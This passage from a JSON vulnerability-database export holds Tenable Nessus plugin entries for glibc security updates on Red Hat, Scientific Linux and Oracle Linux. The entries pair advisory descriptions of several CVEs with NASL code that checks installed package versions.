script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1526\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:28", "references": ["http://www.nessus.org/u?74c276b9"], "pluginID": "61187", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nThis update also fixes several bugs and adds various enhancements.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.", "edition": 6, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL6.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-12-31T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111206_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61187", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61187);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nThis update also fixes several bugs and adds various enhancements.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1112&L=scientific-linux-errata&T=0&P=2038\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74c276b9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:13:02", "references": ["https://access.redhat.com/errata/RHSA-2012:0058", "https://access.redhat.com/security/cve/cve-2009-5029", "https://access.redhat.com/security/cve/cve-2011-4609", "https://access.redhat.com/errata/RHBA-2011:1179"], "pluginID": "57676", "description": "Updated glibc packages that fix two security issues and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs :\n\n* glibc had incorrect information for numeric separators and groupings\nfor specific French, Spanish, and German locales. Therefore,\napplications utilizing glibc's locale support printed numbers with the\nwrong separators and groupings when those locales were in use. With\nthis update, the separator and grouping information has been fixed.\n(BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing\nglibc to incorrectly parse groups with more than 126 members,\nresulting in applications such as 'id' failing to list all the groups\na particular user was a member of. With this update, group parsing has\nbeen fixed. (BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this\nupdate, the race condition has been fixed, and malloc's behavior is\nnow consistent with the documentation regarding the MALLOC_ARENA_TEST\nand MALLOC_ARENA_MAX environment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "edition": 10, "reporter": "Tenable", "published": "2012-01-25T00:00:00", "title": "RHEL 6 : glibc (RHSA-2012:0058)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "modified": "2018-12-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2012-0058.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57676", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0058. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57676);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2011-4609\");\n script_bugtraq_id(51439);\n script_xref(name:\"RHSA\", value:\"2012:0058\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2012:0058)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs :\n\n* glibc had incorrect information for numeric separators and groupings\nfor specific French, Spanish, and German locales. Therefore,\napplications utilizing glibc's locale support printed numbers with the\nwrong separators and groupings when those locales were in use. With\nthis update, the separator and grouping information has been fixed.\n(BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing\nglibc to incorrectly parse groups with more than 126 members,\nresulting in applications such as 'id' failing to list all the groups\na particular user was a member of. With this update, group parsing has\nbeen fixed. (BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this\nupdate, the race condition has been fixed, and malloc's behavior is\nnow consistent with the documentation regarding the MALLOC_ARENA_TEST\nand MALLOC_ARENA_MAX environment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n # https://rhn.redhat.com/errata/RHBA-2011-1179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHBA-2011:1179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0058\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0058\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.47.el6_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:48:46", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "ia64", "packageFilename": "glibc-common-2.5-65.el5_7.3.ia64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "glibc-utils-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "ia64", "packageFilename": "glibc-2.5-65.el5_7.3.ia64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i686", "packageFilename": "glibc-2.5-65.el5_7.3.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i686", "packageFilename": "glibc-2.5-65.el5_7.3.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i686", "packageFilename": "glibc-2.5-65.el5_7.3.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "x86_64", "packageFilename": "nscd-2.5-65.el5_7.3.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "nscd-2.5-65.el5_7.3.i386.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "x86_64", "packageFilename": "glibc-utils-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "glibc-headers-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "src", "packageFilename": "glibc-2.5-65.el5_7.3.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "src", "packageFilename": "glibc-2.5-65.el5_7.3.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "src", "packageFilename": "glibc-2.5-65.el5_7.3.src.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "x86_64", "packageFilename": "glibc-devel-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "ia64", "packageFilename": "glibc-utils-2.5-65.el5_7.3.ia64.rpm", "packageName": "glibc-utils", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "glibc-devel-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "glibc-devel-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "ia64", "packageFilename": "nscd-2.5-65.el5_7.3.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "x86_64", "packageFilename": "glibc-headers-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "ia64", "packageFilename": "glibc-headers-2.5-65.el5_7.3.ia64.rpm", "packageName": "glibc-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "glibc-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "x86_64", "packageFilename": "glibc-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "ia64", "packageFilename": "glibc-devel-2.5-65.el5_7.3.ia64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "x86_64", "packageFilename": "glibc-common-2.5-65.el5_7.3.x86_64.rpm", "packageName": "glibc-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.5-65.el5_7.3", "arch": "i386", "packageFilename": "glibc-common-2.5-65.el5_7.3.i386.rpm", "packageName": "glibc-common", "operator": "lt"}], "description": "[2.5-65.el5_7.3]\n- Use correct type when casting d_tag (#767687)\n- Report write error in addmnt even for cached streams (#767687)\n- ldd: Never run file directly (#767687).\n- Workaround misconfigured system (#767687)\n[2.5-65.el5_7.2]\n- Check values from TZ file header (#767687)", "edition": 3, "reporter": "Oracle", "published": "2012-02-13T00:00:00", "title": "glibc security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-13T00:00:00", "id": "ELSA-2012-0126", "href": 